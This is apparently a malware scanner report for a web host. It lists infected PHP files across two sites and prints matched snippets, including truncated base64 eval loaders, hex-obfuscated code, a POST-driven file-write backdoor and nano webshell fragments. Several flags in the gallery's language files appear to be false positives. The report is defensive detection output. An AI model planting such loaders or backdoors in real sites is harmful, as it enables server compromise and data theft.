/custdata02/turtle/public_html/moving.page/7rLHI2jTiza.php Size: 51.36 kB Created: 2024-06-01 02:24:40 Modified: 2024-06-01 08:12:17 Warns: 2 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($WBZyL($AlFWd($WQIKf('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php n0CL
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/moving.page/index.php Size: 13.95 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 08:12:17 Dangers: 6
| Description | Match |
|---|
Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request | <?php ${"_GET"}
| Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}
| Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea) | <?php \x47\x4c\x4f\x42\x41\x4c\x53
| Sign 301ca578 Dangerous Malware Signature (hash: 301ca578) | <?php trojan
| Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7) | <?php w/cGhw
|
|
/custdata02/turtle/public_html/moving.page/d5MuibchEIR.php Size: 43.48 kB Created: 2024-06-04 19:34:18 Modified: 2024-06-04 19:34:18 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYWhzIShzdgo7KSkpOC0gLG4wazAsJwAApyL...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($SIunp($udwGf($IgvuO($xqlbS('QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYW...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/moving.page/37Oc4qgvkwd.php Size: 166.77 kB Created: 2024-06-04 19:34:18 Modified: 2024-06-04 19:34:18 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
|
|
/custdata02/turtle/public_html/moving.page/5jg7REBVJaW.php Size: 51.81 kB Created: 2024-06-04 19:34:18 Modified: 2024-06-04 19:34:18 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5Rg5VpBJefHMVmPCYH6B...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($MuUwa($tIRhZ('VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5...
| Function strrev eval_strrev Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php LAve
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php N0YX
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/moving.page/B1kyb9LsRIp.php Size: 38.68 kB Created: 2024-06-04 19:34:18 Modified: 2024-06-04 19:34:18 Warns: 1
| Description | Match |
|---|
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦ø][0x00008])))))))))))))))))))
|
|
/custdata02/turtle/public_html/moving.page/theme-inskysa.php Size: 338.00 B Created: 2024-06-04 19:34:18 Modified: 2024-06-04 19:34:18 Dangers: 2
| Description | Match |
|---|
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/moving.page/YAHzcbKs1Rv.php Size: 43.51 kB Created: 2024-06-04 19:51:04 Modified: 2024-06-04 19:51:04 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3sTfsf/gP8/g3TuZHT/YfoP6f/GZv8/UJH...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($fpwQi($fCjKH($LElTj($HJrhk('eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/moving.page/nMgGONQvCeW.php Size: 166.77 kB Created: 2024-06-04 19:51:04 Modified: 2024-06-04 19:51:04 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
|
|
/custdata02/turtle/public_html/moving.page/PxzHU67OcM1.php Size: 51.33 kB Created: 2024-06-04 19:51:04 Modified: 2024-06-04 19:51:04 Warns: 2 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($UbskV($gbWJv($UMwGZ('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php n0CL
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/moving.page/hExQITdAqBy.php Size: 38.68 kB Created: 2024-06-04 19:51:04 Modified: 2024-06-04 19:51:04 Warns: 1
| Description | Match |
|---|
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦ø][0x00008])))))))))))))))))))
|
|
/custdata02/turtle/public_html/moving.page/theme-insxsme.php Size: 338.00 B Created: 2024-06-04 19:51:04 Modified: 2024-06-04 19:51:04 Dangers: 2
| Description | Match |
|---|
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/ryan-and-lisa/albums/edit/index.php Size: 1.27 kB Created: 2012-10-14 07:48:56 Modified: 2024-06-02 06:32:49 Dangers: 1
| Description | Match |
|---|
Sign 0f37c730 Line: 6 Dangerous Malware Signature (hash: 0f37c730) | <?php meta http-equiv="refresh" content="0;
|
|
/custdata02/turtle/public_html/ryan-and-lisa/albums/userpics/index.php Size: 1.29 kB Created: 2012-10-14 07:48:56 Modified: 2024-06-02 06:32:49 Dangers: 1
| Description | Match |
|---|
Sign 0f37c730 Line: 6 Dangerous Malware Signature (hash: 0f37c730) | <?php meta http-equiv="refresh" content="0;
|
|
/custdata02/turtle/public_html/ryan-and-lisa/albums/index.php Size: 1.14 kB Created: 2012-10-14 07:48:56 Modified: 2024-06-02 06:32:49 Dangers: 1
| Description | Match |
|---|
Sign 0f37c730 Line: 6 Dangerous Malware Signature (hash: 0f37c730) | <?php meta http-equiv="refresh" content="0;
|
|
/custdata02/turtle/public_html/ryan-and-lisa/include/imageobject_im.class.php Size: 6.18 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] | <?php exec ("\"$cmd\"", $output, $retval); } else { $cmd = "{$CONFIG['impath']}convert -quality {$this->quality} {$CONFIG['im_options']} -crop {$new_w}x{$new_h}+{$clip_left}+{$clip_top} $imgFile $imgFile"; exec($cmd, $output, $retval); } $this->imageObject($this->directory, $this->filename); return $this; } function rotateImage($angle) { global $CONFIG; $superCage = Inspekt::makeSuperCage(); $imgFile = escapeshellarg("$this->directory$this->filename"); $output = array(); if ($superCage->env->getMatche...
|
|
/custdata02/turtle/public_html/ryan-and-lisa/include/index.php Size: 1.15 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Dangers: 1
| Description | Match |
|---|
Sign 0f37c730 Line: 6 Dangerous Malware Signature (hash: 0f37c730) | <?php meta http-equiv="refresh" content="0;
|
|
/custdata02/turtle/public_html/ryan-and-lisa/include/init.inc.php Size: 17.08 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 91 Dangerous Malware Signature (hash: 11413268) | <?php exploit
|
|
/custdata02/turtle/public_html/ryan-and-lisa/include/picmgmt.inc.php Size: 32.54 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] | <?php exec ("\"$cmd\"", $output, $retval); } else { $cmd = "{$CONFIG['impath']}convert -quality {$CONFIG['jpeg_qual']} {$CONFIG['im_options']} ".$resize_commands." ".$unsharp_mask." $src_file $im_dest_file"; exec ($cmd, $output, $retval); } if ($media_type != "false") { $path_parts = pathinfo($CONFIG['watermark_file']); $CONFIG['watermark_file'] = $path_parts["dirname"]."/wm_".$media_type.".png"; } if ($watermark == "true" || $media_type != "false") { $wm_normal = (int)$CONFIG['reduce_watermark']; if ...
|
|
/custdata02/turtle/public_html/ryan-and-lisa/include/transliteration.inc.php Size: 7.88 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Dangers: 1
| Description | Match |
|---|
Exploit hex_char Line: 118 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
|
|
/custdata02/turtle/public_html/ryan-and-lisa/include/zip.lib.php Size: 11.81 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval('$hexdtime = "' . $hexdtime . '";'); if($compact) $fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hexdtime; else $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00".$hexdtime; $unc_len = strlen($data); $crc = crc32($data); if($compact){ $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); }else{ $zdata = $data; } $c_len=strlen($zdata); $fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); $fr .= pack('v', strlen($name)).pack(...
|
|
/custdata02/turtle/public_html/ryan-and-lisa/include/functions.inc.php Size: 224.33 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:35:12 Warns: 2 Dangers: 3
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($msortline); return $marray; } function cpg_get_bridge_db_values() { global $CONFIG; $results = cpg_db_query("SELECT name, value FROM {$CONFIG['TABLE_BRIDGE']}"); while ( ($row = mysql_fetch_assoc($results)) ) { $BRIDGE[$row['name']] = $row['value']; } mysql_free_result($results); return $BRIDGE; } function cpg_get_webroot_path() { global $CPG_PHP_SELF; $superCage = Inspekt::makeSuperCage(); if ( ($matches = $superCage->server->getMatched('SCRIPT_FILENAME', '/^[a-z,A-Z0-9_-\/\\:.]+$/')) ) {...
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] | <?php exec( 'tasklist /FI "PID eq ' . getmypid() . '" /FO LIST', $output ); return preg_replace( '/[^0-9]/', '', $output[5] ) * 1024; } else { $pid = getmypid(); $output = array(); exec("ps -eo%mem,rss,pid | grep $pid", $output); $output = explode(' ', $output[0]); if ($output != '') { return $output[1] * 1024; } else { unset($output); $output = array(); exec("ps -o rss -p $pid", $output); return $output[1] *1024; } } } } function cpg_fillArrayFieldWithSpaces($text, $maxchars, $fillUpOn = 'right') { ...
| Function strrev eval_strrev Line: 4846 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php lave
| Sign 11413268 Line: 4768 Dangerous Malware Signature (hash: 11413268) | <?php exploit
| Sign 471b95ee Line: 3918 Dangerous Malware Signature (hash: 471b95ee) | <?php suhosin
|
|
/custdata02/turtle/public_html/ryan-and-lisa/lang/brazilian_portuguese.php Size: 183.25 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] | <?php system (if corresponding options are turned on in config).'; $lang_gallery_admin_menu['keywordmgr_lnk'] = 'Gerenciar Palavras-Chave'; $lang_gallery_admin_menu['keywordmgr_title'] = 'Gerenciar Palavras-Chave (Se a opção correspondente for ativada na configuração).'; $lang_gallery_admin_menu['exifmgr_lnk'] = 'Gerenciar EXIF'; $lang_gallery_admin_menu['exifmgr_title'] = 'Manage EXIF display (if corresponding option is turned on in config).'; $lang_gallery_admin_menu['shownews_lnk'] = 'Exibir No...
|
|
/custdata02/turtle/public_html/ryan-and-lisa/lang/catalan.php Size: 192.96 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Dangers: 1
| Description | Match |
|---|
Function strrev eval_strrev Line: 763 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php lave
|
|
/custdata02/turtle/public_html/ryan-and-lisa/lang/danish.php Size: 183.48 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function strrev eval_strrev Line: 412 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php lave
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] | <?php system (hvis funktionerne er slået til i konfig).'; $lang_gallery_admin_menu['keywordmgr_lnk'] = 'Nøgleords manager'; $lang_gallery_admin_menu['keywordmgr_title'] = 'Manage nøgleord (hvis funktionerne er slået til i konfig).'; $lang_gallery_admin_menu['exifmgr_lnk'] = 'EXIF manager'; $lang_gallery_admin_menu['exifmgr_title'] = 'Manage EXIF visning (hvis funktionerne er slået til i konfig).'; $lang_gallery_admin_menu['shownews_lnk'] = 'Vis Nyheder'; $lang_gallery_admin_menu['shownews_title']...
|
|
/custdata02/turtle/public_html/ryan-and-lisa/lang/dutch.php Size: 193.20 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] | <?php system (als de betrokken optie aangevinkt is in config).'; $lang_gallery_admin_menu['keywordmgr_lnk'] = 'Trefwoord manager'; $lang_gallery_admin_menu['keywordmgr_title'] = 'Beheer trefwoorden (als de betrokken optie aangevinkt is in config).'; $lang_gallery_admin_menu['exifmgr_lnk'] = 'EXIF manager'; $lang_gallery_admin_menu['exifmgr_title'] = 'Stel de EXIF display in (als de betrokken optie aangevinkt is in config).'; $lang_gallery_admin_menu['shownews_lnk'] = 'Toon Nieuws'; $lang_gallery_admin...
|
|
/custdata02/turtle/public_html/ryan-and-lisa/lang/english.php Size: 181.89 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] | <?php system (if corresponding options are turned on in config).'; $lang_gallery_admin_menu['keywordmgr_lnk'] = 'Keyword manager'; $lang_gallery_admin_menu['keywordmgr_title'] = 'Manage keywords (if corresponding option is turned on in config).'; $lang_gallery_admin_menu['exifmgr_lnk'] = 'EXIF manager'; $lang_gallery_admin_menu['exifmgr_title'] = 'Manage EXIF display (if corresponding option is turned on in config).'; $lang_gallery_admin_menu['shownews_lnk'] = 'Show News'; $lang_gallery_admin_menu['sh...
|
|
/custdata02/turtle/public_html/ryan-and-lisa/lang/french.php Size: 202.93 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 234 Dangerous Malware Signature (hash: 11413268) | <?php exploit
|
|
/custdata02/turtle/public_html/ryan-and-lisa/lang/norwegian.php Size: 183.91 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Dangers: 1
| Description | Match |
|---|
Function strrev eval_strrev Line: 1517 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php lave
|
|
/custdata02/turtle/public_html/ryan-and-lisa/lang/polish.php Size: 189.24 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] | <?php system (if corresponding options are turned on in config).'; $lang_gallery_admin_menu['keywordmgr_lnk'] = 'Keyword manager'; $lang_gallery_admin_menu['keywordmgr_title'] = 'Manage keywords (if corresponding option is turned on in config).'; $lang_gallery_admin_menu['exifmgr_lnk'] = 'EXIF manager'; $lang_gallery_admin_menu['exifmgr_title'] = 'Manage EXIF display (if corresponding option is turned on in config).'; $lang_gallery_admin_menu['shownews_lnk'] = 'Pokaż wiadomości'; $lang_gallery_admin...
|
|
/custdata02/turtle/public_html/ryan-and-lisa/lang/spanish.php Size: 194.11 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Dangers: 1
| Description | Match |
|---|
Function strrev eval_strrev Line: 116 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php lave
|
|
/custdata02/turtle/public_html/ryan-and-lisa/lang/spanish_mx.php Size: 184.42 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Dangers: 1
| Description | Match |
|---|
Function strrev eval_strrev Line: 109 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php lave
|
|
/custdata02/turtle/public_html/ryan-and-lisa/plugins/usergal_alphatabs/codebase.php Size: 17.13 kB Created: 2012-10-14 07:50:06 Modified: 2024-06-02 06:32:49 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval('
class new_udb_class extends '. get_class($cpg_udb) . ' {
function new_udb_class() {}
function list_users_query(&$user_count)
{
global $CONFIG, $FORBIDDEN_SET, $PAGE;
$superCage = Inspekt::makeSuperCage();
$getLetter = $superCage->get->getAlpha("letter");
$f =& $this->field;
if ($FORBIDDEN_SET != "") {
$forbidden_with_icon = "AND (1 $FORBIDDEN_SET or p.galleryicon=p.pid)";
...
|
|
/custdata02/turtle/public_html/ryan-and-lisa/plugins/visiblehookpoints/codebase.php Size: 29.87 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($this->xmlSData[$i]); $this->makeTDHeader("xml","xmlText"); echo (!empty($this->xmlCData[$i])) ? $this->xmlCData[$i] : " "; echo $this->closeTDRow(); $this->makeTDHeader("xml","xmlComment"); echo (!empty($this->xmlDData[$i])) ? $this->xmlDData[$i] : " "; echo $this->closeTDRow(); $this->makeTDHeader("xml","xmlChildren"); unset($this->xmlCData[$i],$this->xmlDData[$i]); } echo $this->closeTDRow(); echo "</table>"; $this->xmlCount=0; } function xmlCharacterData($parser,$data) { $coun...
|
|
/custdata02/turtle/public_html/ryan-and-lisa/themes/hardwired/images/navbar/index.php Size: 18.30 kB Created: 2022-05-23 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 26
| Description | Match |
|---|
Exploit nano Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[18]( $c8[14]($Jd . "/" . jd($_GET["n"])
| Exploit nano Line: 190 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[6]($yf)
| Exploit nano Line: 352 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[11]($_FILES["f"]["tmp_name"][$lE], $Wx[$lE])
| Exploit nano Line: 370 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[17](JD($_GET["n"])
| Exploit nano Line: 378 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[4]("/(\\\\|\\/)
